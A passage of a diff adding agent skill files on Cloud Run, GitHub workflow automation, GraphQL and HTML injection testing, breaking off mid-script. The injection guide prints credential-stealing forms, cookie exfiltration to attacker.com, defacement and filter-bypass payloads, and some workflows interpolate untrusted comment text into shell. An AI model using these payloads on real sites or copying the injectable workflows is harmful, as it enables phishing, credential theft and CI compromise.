functions.http('helloHttp', (req, res) => {
const name = req.query.name || req.body.name || 'World';
res.send(`Hello, ${name}!`);
});
```
```javascript
// Pub/Sub Function
const functions = require('@google-cloud/functions-framework');
functions.cloudEvent('processPubSub', (cloudEvent) => {
// Decode Pub/Sub message
const message = cloudEvent.data.message;
const data = message.data
? JSON.parse(Buffer.from(message.data, 'base64').toString())
: {};
console.log('Received message:', data);
// Process message
processMessage(data);
});
```
```javascript
// Cloud Storage Function
const functions = require('@google-cloud/functions-framework');
functions.cloudEvent('processStorageEvent', async (cloudEvent) => {
const file = cloudEvent.data;
console.log(`Event: ${cloudEvent.type}`);
console.log(`Bucket: ${file.bucket}`);
console.log(`File: ${file.name}`);
if (cloudEvent.type === 'google.cloud.storage.object.v1.finalized') {
await processUploadedFile(file.bucket, file.name);
}
});
```
```bash
# Deploy HTTP function
gcloud functions deploy hello-http \
--gen2 \
--runtime nodejs20 \
--trigger-http \
--allow-unauthenticated \
--region us-central1
# Deploy Pub/Sub function
gcloud functions deploy process-messages \
--gen2 \
--runtime nodejs20 \
--trigger-topic my-topic \
--region us-central1
# Deploy Cloud Storage function
gcloud functions deploy process-uploads \
--gen2 \
--runtime nodejs20 \
--trigger-event-filters="type=google.cloud.storage.object.v1.finalized" \
--trigger-event-filters="bucket=my-bucket" \
--region us-central1
```
```
### Cold Start Optimization Pattern
Minimize cold start latency for Cloud Run
**When to use**: ['Latency-sensitive applications', 'User-facing APIs', 'High-traffic services']
```javascript
## 1. Enable Startup CPU Boost
```bash
gcloud run deploy my-service \
--cpu-boost \
--region us-central1
```
## 2. Set Minimum Instances
```bash
gcloud run deploy my-service \
--min-instances 1 \
--region us-central1
```
## 3. Optimize Container Image
```dockerfile
# Use distroless for minimal image
FROM node:20-slim AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci --only=production
FROM gcr.io/distroless/nodejs20-debian12
WORKDIR /app
COPY --from=builder /app/node_modules ./node_modules
COPY src ./src
CMD ["src/index.js"]
```
## 4. Lazy Initialize Heavy Dependencies
```javascript
// Lazy load heavy libraries
let bigQueryClient = null;
function getBigQueryClient() {
if (!bigQueryClient) {
const { BigQuery } = require('@google-cloud/bigquery');
bigQueryClient = new BigQuery();
}
return bigQueryClient;
}
// Only initialize when needed
app.get('/api/analytics', async (req, res) => {
const client = getBigQueryClient();
const results = await client.query({...});
res.json(results);
});
```
## 5. Increase Memory (More CPU)
```bash
# Higher memory = more CPU during startup
gcloud run deploy my-service \
--memory 1Gi \
--cpu 2 \
--region us-central1
```
```
## Anti-Patterns
### ❌ CPU-Intensive Work Without Concurrency=1
**Why bad**: CPU is shared across concurrent requests. CPU-bound work
will starve other requests, causing timeouts.
### ❌ Writing Large Files to /tmp
**Why bad**: /tmp is an in-memory filesystem. Large files consume
your memory allocation and can cause OOM errors.
### ❌ Long-Running Background Tasks
**Why bad**: Cloud Run throttles CPU to near-zero when not handling
requests. Background tasks will be extremely slow or stall.
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | high | ## Calculate memory including /tmp usage |
| Issue | high | ## Set appropriate concurrency |
| Issue | high | ## Enable CPU always allocated |
| Issue | medium | ## Configure connection pool with keep-alive |
| Issue | high | ## Enable startup CPU boost |
| Issue | medium | ## Explicitly set execution environment |
| Issue | medium | ## Set consistent timeouts |

846
skills/github-workflow-automation/SKILL.md Normal file
View File

@@ -0,0 +1,846 @@
---
name: github-workflow-automation
description: "Automate GitHub workflows with AI assistance. Includes PR reviews, issue triage, CI/CD integration, and Git operations. Use when automating GitHub workflows, setting up PR review automation, creating GitHub Actions, or triaging issues."
---
# 🔧 GitHub Workflow Automation
> Patterns for automating GitHub workflows with AI assistance, inspired by [Gemini CLI](https://github.com/google-gemini/gemini-cli) and modern DevOps practices.
## When to Use This Skill
Use this skill when:
- Automating PR reviews with AI
- Setting up issue triage automation
- Creating GitHub Actions workflows
- Integrating AI into CI/CD pipelines
- Automating Git operations (rebases, cherry-picks)
---
## 1. Automated PR Review
### 1.1 PR Review Action
```yaml
# .github/workflows/ai-review.yml
name: AI Code Review
on:
pull_request:
types: [opened, synchronize]
jobs:
review:
runs-on: ubuntu-latest
permissions:
contents: read
pull-requests: write
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Get changed files
id: changed
run: |
files=$(git diff --name-only origin/${{ github.base_ref }}...HEAD)
echo "files<<EOF" >> $GITHUB_OUTPUT
echo "$files" >> $GITHUB_OUTPUT
echo "EOF" >> $GITHUB_OUTPUT
- name: Get diff
id: diff
run: |
diff=$(git diff origin/${{ github.base_ref }}...HEAD)
echo "diff<<EOF" >> $GITHUB_OUTPUT
echo "$diff" >> $GITHUB_OUTPUT
echo "EOF" >> $GITHUB_OUTPUT
- name: AI Review
uses: actions/github-script@v7
with:
script: |
const { Anthropic } = require('@anthropic-ai/sdk');
const client = new Anthropic({ apiKey: process.env.ANTHROPIC_API_KEY });
const response = await client.messages.create({
model: "claude-3-sonnet-20240229",
max_tokens: 4096,
messages: [{
role: "user",
content: `Review this PR diff and provide feedback:
Changed files: ${{ steps.changed.outputs.files }}
Diff:
${{ steps.diff.outputs.diff }}
Provide:
1. Summary of changes
2. Potential issues or bugs
3. Suggestions for improvement
4. Security concerns if any
Format as GitHub markdown.`
}]
});
await github.rest.pulls.createReview({
owner: context.repo.owner,
repo: context.repo.repo,
pull_number: context.issue.number,
body: response.content[0].text,
event: 'COMMENT'
});
env:
ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
```
### 1.2 Review Comment Patterns
````markdown
# AI Review Structure
## 📋 Summary
Brief description of what this PR does.
## ✅ What looks good
- Well-structured code
- Good test coverage
- Clear naming conventions
## ⚠️ Potential Issues
1. **Line 42**: Possible null pointer exception
```javascript
// Current
user.profile.name;
// Suggested
user?.profile?.name ?? "Unknown";
```
````
2. **Line 78**: Consider error handling
```javascript
// Add try-catch or .catch()
```
## 💡 Suggestions
- Consider extracting the validation logic into a separate function
- Add JSDoc comments for public methods
## 🔒 Security Notes
- No sensitive data exposure detected
- API key handling looks correct
````
### 1.3 Focused Reviews
```yaml
# Review only specific file types
- name: Filter code files
run: |
files=$(git diff --name-only origin/${{ github.base_ref }}...HEAD | \
grep -E '\.(ts|tsx|js|jsx|py|go)$' || true)
echo "code_files=$files" >> $GITHUB_OUTPUT
# Review with context
- name: AI Review with context
run: |
# Include relevant context files
context=""
for file in ${{ steps.changed.outputs.files }}; do
if [[ -f "$file" ]]; then
context+="=== $file ===\n$(cat $file)\n\n"
fi
done
# Send to AI with full file context
````
---
## 2. Issue Triage Automation
### 2.1 Auto-label Issues
```yaml
# .github/workflows/issue-triage.yml
name: Issue Triage
on:
issues:
types: [opened]
jobs:
triage:
runs-on: ubuntu-latest
permissions:
issues: write
steps:
- name: Analyze issue
uses: actions/github-script@v7
with:
script: |
const issue = context.payload.issue;
// Call AI to analyze
const analysis = await analyzeIssue(issue.title, issue.body);
// Apply labels
const labels = [];
if (analysis.type === 'bug') {
labels.push('bug');
if (analysis.severity === 'high') labels.push('priority: high');
} else if (analysis.type === 'feature') {
labels.push('enhancement');
} else if (analysis.type === 'question') {
labels.push('question');
}
if (analysis.area) {
labels.push(`area: ${analysis.area}`);
}
await github.rest.issues.addLabels({
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: issue.number,
labels: labels
});
// Add initial response
if (analysis.type === 'bug' && !analysis.hasReproSteps) {
await github.rest.issues.createComment({
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: issue.number,
body: `Thanks for reporting this issue!
To help us investigate, could you please provide:
- Steps to reproduce the issue
- Expected behavior
- Actual behavior
- Environment (OS, version, etc.)
This will help us resolve your issue faster. 🙏`
});
}
```
### 2.2 Issue Analysis Prompt
```typescript
const TRIAGE_PROMPT = `
Analyze this GitHub issue and classify it:
Title: {title}
Body: {body}
Return JSON with:
{
"type": "bug" | "feature" | "question" | "docs" | "other",
"severity": "low" | "medium" | "high" | "critical",
"area": "frontend" | "backend" | "api" | "docs" | "ci" | "other",
"summary": "one-line summary",
"hasReproSteps": boolean,
"isFirstContribution": boolean,
"suggestedLabels": ["label1", "label2"],
"suggestedAssignees": ["username"] // based on area expertise
}
`;
```
### 2.3 Stale Issue Management
```yaml
# .github/workflows/stale.yml
name: Manage Stale Issues
on:
schedule:
- cron: "0 0 * * *" # Daily
jobs:
stale:
runs-on: ubuntu-latest
steps:
- uses: actions/stale@v9
with:
stale-issue-message: |
This issue has been automatically marked as stale because it has not had
recent activity. It will be closed in 14 days if no further activity occurs.
If this issue is still relevant:
- Add a comment with an update
- Remove the `stale` label
Thank you for your contributions! 🙏
stale-pr-message: |
This PR has been automatically marked as stale. Please update it or it
will be closed in 14 days.
days-before-stale: 60
days-before-close: 14
stale-issue-label: "stale"
stale-pr-label: "stale"
exempt-issue-labels: "pinned,security,in-progress"
exempt-pr-labels: "pinned,security"
```
---
## 3. CI/CD Integration
### 3.1 Smart Test Selection
```yaml
# .github/workflows/smart-tests.yml
name: Smart Test Selection
on:
pull_request:
jobs:
analyze:
runs-on: ubuntu-latest
outputs:
test_suites: ${{ steps.analyze.outputs.suites }}
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Analyze changes
id: analyze
run: |
# Get changed files
changed=$(git diff --name-only origin/${{ github.base_ref }}...HEAD)
# Determine which test suites to run
suites="[]"
if echo "$changed" | grep -q "^src/api/"; then
suites=$(echo $suites | jq '. + ["api"]')
fi
if echo "$changed" | grep -q "^src/frontend/"; then
suites=$(echo $suites | jq '. + ["frontend"]')
fi
if echo "$changed" | grep -q "^src/database/"; then
suites=$(echo $suites | jq '. + ["database", "api"]')
fi
# If nothing specific, run all
if [ "$suites" = "[]" ]; then
suites='["all"]'
fi
echo "suites=$suites" >> $GITHUB_OUTPUT
test:
needs: analyze
runs-on: ubuntu-latest
strategy:
matrix:
suite: ${{ fromJson(needs.analyze.outputs.test_suites) }}
steps:
- uses: actions/checkout@v4
- name: Run tests
run: |
if [ "${{ matrix.suite }}" = "all" ]; then
npm test
else
npm test -- --suite ${{ matrix.suite }}
fi
```
### 3.2 Deployment with AI Validation
```yaml
# .github/workflows/deploy.yml
name: Deploy with AI Validation
on:
push:
branches: [main]
jobs:
validate:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Get deployment changes
id: changes
run: |
# Get commits since last deployment
last_deploy=$(git describe --tags --abbrev=0 2>/dev/null || echo "")
if [ -n "$last_deploy" ]; then
changes=$(git log --oneline $last_deploy..HEAD)
else
changes=$(git log --oneline -10)
fi
echo "changes<<EOF" >> $GITHUB_OUTPUT
echo "$changes" >> $GITHUB_OUTPUT
echo "EOF" >> $GITHUB_OUTPUT
- name: AI Risk Assessment
id: assess
uses: actions/github-script@v7
with:
script: |
// Analyze changes for deployment risk
const prompt = `
Analyze these changes for deployment risk:
${process.env.CHANGES}
Return JSON:
{
"riskLevel": "low" | "medium" | "high",
"concerns": ["concern1", "concern2"],
"recommendations": ["rec1", "rec2"],
"requiresManualApproval": boolean
}
`;
// Call AI and parse response
const analysis = await callAI(prompt);
if (analysis.riskLevel === 'high') {
core.setFailed('High-risk deployment detected. Manual review required.');
}
return analysis;
env:
CHANGES: ${{ steps.changes.outputs.changes }}
deploy:
needs: validate
runs-on: ubuntu-latest
environment: production
steps:
- name: Deploy
run: |
echo "Deploying to production..."
# Deployment commands here
```
### 3.3 Rollback Automation
```yaml
# .github/workflows/rollback.yml
name: Automated Rollback
on:
workflow_dispatch:
inputs:
reason:
description: "Reason for rollback"
required: true
jobs:
rollback:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Find last stable version
id: stable
run: |
# Find last successful deployment
stable=$(git tag -l 'v*' --sort=-version:refname | head -1)
echo "version=$stable" >> $GITHUB_OUTPUT
- name: Rollback
run: |
git checkout ${{ steps.stable.outputs.version }}
# Deploy stable version
npm run deploy
- name: Notify team
uses: slackapi/slack-github-action@v1
with:
payload: |
{
"text": "🔄 Production rolled back to ${{ steps.stable.outputs.version }}",
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": "*Rollback executed*\n• Version: `${{ steps.stable.outputs.version }}`\n• Reason: ${{ inputs.reason }}\n• Triggered by: ${{ github.actor }}"
}
}
]
}
```
---
## 4. Git Operations
### 4.1 Automated Rebasing
```yaml
# .github/workflows/auto-rebase.yml
name: Auto Rebase
on:
issue_comment:
types: [created]
jobs:
rebase:
if: github.event.issue.pull_request && contains(github.event.comment.body, '/rebase')
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
token: ${{ secrets.GITHUB_TOKEN }}
- name: Setup Git
run: |
git config user.name "github-actions[bot]"
git config user.email "github-actions[bot]@users.noreply.github.com"
- name: Rebase PR
run: |
# Fetch PR branch
gh pr checkout ${{ github.event.issue.number }}
# Rebase onto main
git fetch origin main
git rebase origin/main
# Force push
git push --force-with-lease
env:
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
- name: Comment result
uses: actions/github-script@v7
with:
script: |
github.rest.issues.createComment({
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: context.issue.number,
body: '✅ Successfully rebased onto main!'
})
```
### 4.2 Smart Cherry-Pick
```typescript
// AI-assisted cherry-pick that handles conflicts
async function smartCherryPick(commitHash: string, targetBranch: string) {
// Get commit info
const commitInfo = await exec(`git show ${commitHash} --stat`);
// Check for potential conflicts
const targetDiff = await exec(
`git diff ${targetBranch}...HEAD -- ${affectedFiles}`
);
// AI analysis
const analysis = await ai.analyze(`
I need to cherry-pick this commit to ${targetBranch}:
${commitInfo}
Current state of affected files on ${targetBranch}:
${targetDiff}
Will there be conflicts? If so, suggest resolution strategy.
`);
if (analysis.willConflict) {
// Create branch for manual resolution
await exec(
`git checkout -b cherry-pick-${commitHash.slice(0, 7)} ${targetBranch}`
);
const result = await exec(`git cherry-pick ${commitHash}`, {
allowFail: true,
});
if (result.failed) {
// AI-assisted conflict resolution
const conflicts = await getConflicts();
for (const conflict of conflicts) {
const resolution = await ai.resolveConflict(conflict);
await applyResolution(conflict.file, resolution);
}
}
} else {
await exec(`git checkout ${targetBranch}`);
await exec(`git cherry-pick ${commitHash}`);
}
}
```
### 4.3 Branch Cleanup
```yaml
# .github/workflows/branch-cleanup.yml
name: Branch Cleanup
on:
schedule:
- cron: '0 0 * * 0' # Weekly
workflow_dispatch:
jobs:
cleanup:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Find stale branches
id: stale
run: |
# Branches not updated in 30 days
stale=$(git for-each-ref --sort=-committerdate refs/remotes/origin \
--format='%(refname:short) %(committerdate:relative)' | \
grep -E '[3-9][0-9]+ days|[0-9]+ months|[0-9]+ years' | \
grep -v 'origin/main\|origin/develop' | \
cut -d' ' -f1 | sed 's|origin/||')
echo "branches<<EOF" >> $GITHUB_OUTPUT
echo "$stale" >> $GITHUB_OUTPUT
echo "EOF" >> $GITHUB_OUTPUT
- name: Create cleanup PR
if: steps.stale.outputs.branches != ''
uses: actions/github-script@v7
with:
script: |
const branches = `${{ steps.stale.outputs.branches }}`.split('\n').filter(Boolean);
const body = `## 🧹 Stale Branch Cleanup
The following branches haven't been updated in over 30 days:
${branches.map(b => `- \`${b}\``).join('\n')}
### Actions:
- [ ] Review each branch
- [ ] Delete branches that are no longer needed
- Comment \`/keep branch-name\` to preserve specific branches
`;
await github.rest.issues.create({
owner: context.repo.owner,
repo: context.repo.repo,
title: 'Stale Branch Cleanup',
body: body,
labels: ['housekeeping']
});
```
---
## 5. On-Demand Assistance
### 5.1 @mention Bot
```yaml
# .github/workflows/mention-bot.yml
name: AI Mention Bot
on:
issue_comment:
types: [created]
pull_request_review_comment:
types: [created]
jobs:
respond:
if: contains(github.event.comment.body, '@ai-helper')
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Extract question
id: question
run: |
# Extract text after @ai-helper
question=$(echo "${{ github.event.comment.body }}" | sed 's/.*@ai-helper//')
echo "question=$question" >> $GITHUB_OUTPUT
- name: Get context
id: context
run: |
if [ "${{ github.event.issue.pull_request }}" != "" ]; then
# It's a PR - get diff
gh pr diff ${{ github.event.issue.number }} > context.txt
else
# It's an issue - get description
gh issue view ${{ github.event.issue.number }} --json body -q .body > context.txt
fi
echo "context=$(cat context.txt)" >> $GITHUB_OUTPUT
env:
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
- name: AI Response
uses: actions/github-script@v7
with:
script: |
const response = await ai.chat(`
Context: ${process.env.CONTEXT}
Question: ${process.env.QUESTION}
Provide a helpful, specific answer. Include code examples if relevant.
`);
await github.rest.issues.createComment({
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: context.issue.number,
body: response
});
env:
CONTEXT: ${{ steps.context.outputs.context }}
QUESTION: ${{ steps.question.outputs.question }}
```
### 5.2 Command Patterns
```markdown
## Available Commands
| Command | Description |
| :------------------- | :-------------------------- |
| `@ai-helper explain` | Explain the code in this PR |
| `@ai-helper review` | Request AI code review |
| `@ai-helper fix` | Suggest fixes for issues |
| `@ai-helper test` | Generate test cases |
| `@ai-helper docs` | Generate documentation |
| `/rebase` | Rebase PR onto main |
| `/update` | Update PR branch from main |
| `/approve` | Mark as approved by bot |
| `/label bug` | Add 'bug' label |
| `/assign @user` | Assign to user |
```
---
## 6. Repository Configuration
### 6.1 CODEOWNERS
```
# .github/CODEOWNERS
# Global owners
* @org/core-team
# Frontend
/src/frontend/ @org/frontend-team
*.tsx @org/frontend-team
*.css @org/frontend-team
# Backend
/src/api/ @org/backend-team
/src/database/ @org/backend-team
# Infrastructure
/.github/ @org/devops-team
/terraform/ @org/devops-team
Dockerfile @org/devops-team
# Docs
/docs/ @org/docs-team
*.md @org/docs-team
# Security-sensitive
/src/auth/ @org/security-team
/src/crypto/ @org/security-team
```
### 6.2 Branch Protection
```yaml
# Set up via GitHub API
- name: Configure branch protection
uses: actions/github-script@v7
with:
script: |
await github.rest.repos.updateBranchProtection({
owner: context.repo.owner,
repo: context.repo.repo,
branch: 'main',
required_status_checks: {
strict: true,
contexts: ['test', 'lint', 'ai-review']
},
enforce_admins: true,
required_pull_request_reviews: {
required_approving_review_count: 1,
require_code_owner_reviews: true,
dismiss_stale_reviews: true
},
restrictions: null,
required_linear_history: true,
allow_force_pushes: false,
allow_deletions: false
});
```
---
## Best Practices
### Security
- [ ] Store API keys in GitHub Secrets
- [ ] Use minimal permissions in workflows
- [ ] Validate all inputs
- [ ] Don't expose sensitive data in logs
### Performance
- [ ] Cache dependencies
- [ ] Use matrix builds for parallel testing
- [ ] Skip unnecessary jobs with path filters
- [ ] Use self-hosted runners for heavy workloads
### Reliability
- [ ] Add timeouts to jobs
- [ ] Handle rate limits gracefully
- [ ] Implement retry logic
- [ ] Have rollback procedures
---
## Resources
- [Gemini CLI GitHub Action](https://github.com/google-github-actions/run-gemini-cli)
- [GitHub Actions Documentation](https://docs.github.com/en/actions)
- [GitHub REST API](https://docs.github.com/en/rest)
- [CODEOWNERS Syntax](https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/customizing-your-repository/about-code-owners)

68
skills/graphql/SKILL.md Normal file
View File

@@ -0,0 +1,68 @@
---
name: graphql
description: "GraphQL gives clients exactly the data they need - no more, no less. One endpoint, typed schema, introspection. But the flexibility that makes it powerful also makes it dangerous. Without proper controls, clients can craft queries that bring down your server. This skill covers schema design, resolvers, DataLoader for N+1 prevention, federation for microservices, and client integration with Apollo/urql. Key insight: GraphQL is a contract. The schema is the API documentation. Design it carefully."
source: vibeship-spawner-skills (Apache 2.0)
---
# GraphQL
You're a developer who has built GraphQL APIs at scale. You've seen the
N+1 query problem bring down production servers. You've watched clients
craft deeply nested queries that took minutes to resolve. You know that
GraphQL's power is also its danger.
Your hard-won lessons: The team that didn't use DataLoader had unusable
APIs. The team that allowed unlimited query depth got DDoS'd by their
own clients. The team that made everything nullable couldn't distinguish
errors from empty data. You've l
## Capabilities
- graphql-schema-design
- graphql-resolvers
- graphql-federation
- graphql-subscriptions
- graphql-dataloader
- graphql-codegen
- apollo-server
- apollo-client
- urql
## Patterns
### Schema Design
Type-safe schema with proper nullability
### DataLoader for N+1 Prevention
Batch and cache database queries
### Apollo Client Caching
Normalized cache with type policies
## Anti-Patterns
### ❌ No DataLoader
### ❌ No Query Depth Limiting
### ❌ Authorization in Schema
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Each resolver makes separate database queries | critical | # USE DATALOADER |
| Deeply nested queries can DoS your server | critical | # LIMIT QUERY DEPTH AND COMPLEXITY |
| Introspection enabled in production exposes your schema | high | # DISABLE INTROSPECTION IN PRODUCTION |
| Authorization only in schema directives, not resolvers | high | # AUTHORIZE IN RESOLVERS |
| Authorization on queries but not on fields | high | # FIELD-LEVEL AUTHORIZATION |
| Non-null field failure nullifies entire parent | medium | # DESIGN NULLABILITY INTENTIONALLY |
| Expensive queries treated same as cheap ones | medium | # QUERY COST ANALYSIS |
| Subscriptions not properly cleaned up | medium | # PROPER SUBSCRIPTION CLEANUP |
## Related Skills
Works well with: `backend`, `postgres-wizard`, `nextjs-app-router`, `react-patterns`

495
skills/html-injection-testing/SKILL.md Normal file
View File

@@ -0,0 +1,495 @@
---
name: HTML Injection Testing
description: This skill should be used when the user asks to "test for HTML injection", "inject HTML into web pages", "perform HTML injection attacks", "deface web applications", or "test content injection vulnerabilities". It provides comprehensive HTML injection attack techniques and testing methodologies.
---
# HTML Injection Testing
## Purpose
Identify and exploit HTML injection vulnerabilities that allow attackers to inject malicious HTML content into web applications. This vulnerability enables attackers to modify page appearance, create phishing pages, and steal user credentials through injected forms.
## Prerequisites
### Required Tools
- Web browser with developer tools
- Burp Suite or OWASP ZAP
- Tamper Data or similar proxy
- cURL for testing payloads
### Required Knowledge
- HTML fundamentals
- HTTP request/response structure
- Web application input handling
- Difference between HTML injection and XSS
## Outputs and Deliverables
1. **Vulnerability Report** - Identified injection points
2. **Exploitation Proof** - Demonstrated content manipulation
3. **Impact Assessment** - Potential phishing and defacement risks
4. **Remediation Guidance** - Input validation recommendations
## Core Workflow
### Phase 1: Understanding HTML Injection
HTML injection occurs when user input is reflected in web pages without proper sanitization:
```html
<!-- Vulnerable code example -->
<div>
Welcome, <?php echo $_GET['name']; ?>
</div>
<!-- Attack input -->
?name=<h1>Injected Content</h1>
<!-- Rendered output -->
<div>
Welcome, <h1>Injected Content</h1>
</div>
```
Key differences from XSS:
- HTML injection: Only HTML tags are rendered
- XSS: JavaScript code is executed
- HTML injection is often stepping stone to XSS
Attack goals:
- Modify website appearance (defacement)
- Create fake login forms (phishing)
- Inject malicious links
- Display misleading content
### Phase 2: Identifying Injection Points
Map application for potential injection surfaces:
```
1. Search bars and search results
2. Comment sections
3. User profile fields
4. Contact forms and feedback
5. Registration forms
6. URL parameters reflected on page
7. Error messages
8. Page titles and headers
9. Hidden form fields
10. Cookie values reflected on page
```
Common vulnerable parameters:
```
?name=
?user=
?search=
?query=
?message=
?title=
?content=
?redirect=
?url=
?page=
```
### Phase 3: Basic HTML Injection Testing
Test with simple HTML tags:
```html
<!-- Basic text formatting -->
<h1>Test Injection</h1>
<b>Bold Text</b>
<i>Italic Text</i>
<u>Underlined Text</u>
<font color="red">Red Text</font>
<!-- Structural elements -->
<div style="background:red;color:white;padding:10px">Injected DIV</div>
<p>Injected paragraph</p>
<br><br><br>Line breaks
<!-- Links -->
<a href="http://attacker.com">Click Here</a>
<a href="http://attacker.com">Legitimate Link</a>
<!-- Images -->
<img src="http://attacker.com/image.png">
<img src="x" onerror="alert(1)"> <!-- XSS attempt -->
```
Testing workflow:
```bash
# Test basic injection
curl "http://target.com/search?q=<h1>Test</h1>"
# Check if HTML renders in response
curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold"
# Test in URL-encoded form
curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E"
```
### Phase 4: Types of HTML Injection
#### Stored HTML Injection
Payload persists in database:
```html
<!-- Profile bio injection -->
Name: John Doe
Bio: <div style="position:absolute;top:0;left:0;width:100%;height:100%;background:white;">
<h1>Site Under Maintenance</h1>
<p>Please login at <a href="http://attacker.com/login">portal.company.com</a></p>
</div>
<!-- Comment injection -->
Great article!
<form action="http://attacker.com/steal" method="POST">
<input name="username" placeholder="Session expired. Enter username:">
<input name="password" type="password" placeholder="Password:">
<input type="submit" value="Login">
</form>
```
#### Reflected GET Injection
Payload in URL parameters:
```html
<!-- URL injection -->
http://target.com/welcome?name=<h1>Welcome%20Admin</h1><form%20action="http://attacker.com/steal">
<!-- Search result injection -->
http://target.com/search?q=<marquee>Your%20account%20has%20been%20compromised</marquee>
```
#### Reflected POST Injection
Payload in POST data:
```bash
# POST injection test
curl -X POST -d "comment=<div style='color:red'>Malicious Content</div>" \
http://target.com/submit
# Form field injection
curl -X POST -d "name=<script>alert(1)</script>&email=test@test.com" \
http://target.com/register
```
#### URL-Based Injection
Inject into displayed URLs:
```html
<!-- If URL is displayed on page -->
http://target.com/page/<h1>Injected</h1>
<!-- Path-based injection -->
http://target.com/users/<img src=x>/profile
```
### Phase 5: Phishing Attack Construction
Create convincing phishing forms:
```html
<!-- Fake login form overlay -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;
background:white;z-index:9999;padding:50px;">
<h2>Session Expired</h2>
<p>Your session has expired. Please log in again.</p>
<form action="http://attacker.com/capture" method="POST">
<label>Username:</label><br>
<input type="text" name="username" style="width:200px;"><br><br>
<label>Password:</label><br>
<input type="password" name="password" style="width:200px;"><br><br>
<input type="submit" value="Login">
</form>
</div>
<!-- Hidden credential stealer -->
<style>
input { background: url('http://attacker.com/log?data=') }
</style>
<form action="http://attacker.com/steal" method="POST">
<input name="user" placeholder="Verify your username">
<input name="pass" type="password" placeholder="Verify your password">
<button>Verify</button>
</form>
```
URL-encoded phishing link:
```
http://target.com/page?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%20Expired%3C%2Fh2%3E%3Cform%20action%3D%22http%3A%2F%2Fattacker.com%2Fcapture%22%3E%3Cinput%20name%3D%22user%22%20placeholder%3D%22Username%22%3E%3Cinput%20name%3D%22pass%22%20type%3D%22password%22%3E%3Cbutton%3ELogin%3C%2Fbutton%3E%3C%2Fform%3E%3C%2Fdiv%3E
```
### Phase 6: Defacement Payloads
Website appearance manipulation:
```html
<!-- Full page overlay -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;
background:#000;color:#0f0;z-index:9999;
display:flex;justify-content:center;align-items:center;">
<h1>HACKED BY SECURITY TESTER</h1>
</div>
<!-- Content replacement -->
<style>body{display:none}</style>
<body style="display:block !important">
<h1>This site has been compromised</h1>
</body>
<!-- Image injection -->
<img src="http://attacker.com/defaced.jpg"
style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999">
<!-- Marquee injection (visible movement) -->
<marquee behavior="alternate" style="font-size:50px;color:red;">
SECURITY VULNERABILITY DETECTED
</marquee>
```
### Phase 7: Advanced Injection Techniques
#### CSS Injection
```html
<!-- Style injection -->
<style>
body { background: url('http://attacker.com/track?cookie='+document.cookie) }
.content { display: none }
.fake-content { display: block }
</style>
<!-- Inline style injection -->
<div style="background:url('http://attacker.com/log')">Content</div>
```
#### Meta Tag Injection
```html
<!-- Redirect via meta refresh -->
<meta http-equiv="refresh" content="0;url=http://attacker.com/phish">
<!-- CSP bypass attempt -->
<meta http-equiv="Content-Security-Policy" content="default-src *">
```
#### Form Action Override
```html
<!-- Hijack existing form -->
<form action="http://attacker.com/steal">
<!-- If form already exists, add input -->
<input type="hidden" name="extra" value="data">
</form>
```
#### iframe Injection
```html
<!-- Embed external content -->
<iframe src="http://attacker.com/malicious" width="100%" height="500"></iframe>
<!-- Invisible tracking iframe -->
<iframe src="http://attacker.com/track" style="display:none"></iframe>
```
### Phase 8: Bypass Techniques
Evade basic filters:
```html
<!-- Case variations -->
<H1>Test</H1>
<ScRiPt>alert(1)</ScRiPt>
<!-- Encoding variations -->
&#60;h1&#62;Encoded&#60;/h1&#62;
%3Ch1%3EURL%20Encoded%3C%2Fh1%3E
<!-- Tag splitting -->
<h
1>Split Tag</h1>
<!-- Null bytes -->
<h1%00>Null Byte</h1>
<!-- Double encoding -->
%253Ch1%253EDouble%2520Encoded%253C%252Fh1%253E
<!-- Unicode encoding -->
\u003ch1\u003eUnicode\u003c/h1\u003e
<!-- Attribute-based -->
<div onmouseover="alert(1)">Hover me</div>
<img src=x onerror=alert(1)>
```
### Phase 9: Automated Testing
#### Using Burp Suite
```
1. Capture request with potential injection point
2. Send to Intruder
3. Mark parameter value as payload position
4. Load HTML injection wordlist
5. Start attack
6. Filter responses for rendered HTML
7. Manually verify successful injections
```
#### Using OWASP ZAP
```
1. Spider the target application
2. Active Scan with HTML injection rules
3. Review Alerts for injection findings
4. Validate findings manually
```
#### Custom Fuzzing Script
```python
#!/usr/bin/env python3
import requests
import urllib.parse
target = "http://target.com/search"
param = "q"
payloads = [
"<h1>Test</h1>",
"<b>Bold</b>",
"<script>alert(1)</script>",
"<img src=x onerror=alert(1)>",
"<a href='http://evil.com'>Click</a>",
"<div style='color:red'>Styled</div>",
"<marquee>Moving</marquee>",
"<iframe src='http://evil.com'></iframe>",
]
for payload in payloads:
encoded = urllib.parse.quote(payload)
url = f"{target}?{param}={encoded}"
try:
response = requests.get(url, timeout=5)
if payload.lower() in response.text.lower():
print(f"[+] Possible injection: {payload}")
elif "<h1>" in response.text or "<b>" in response.text:
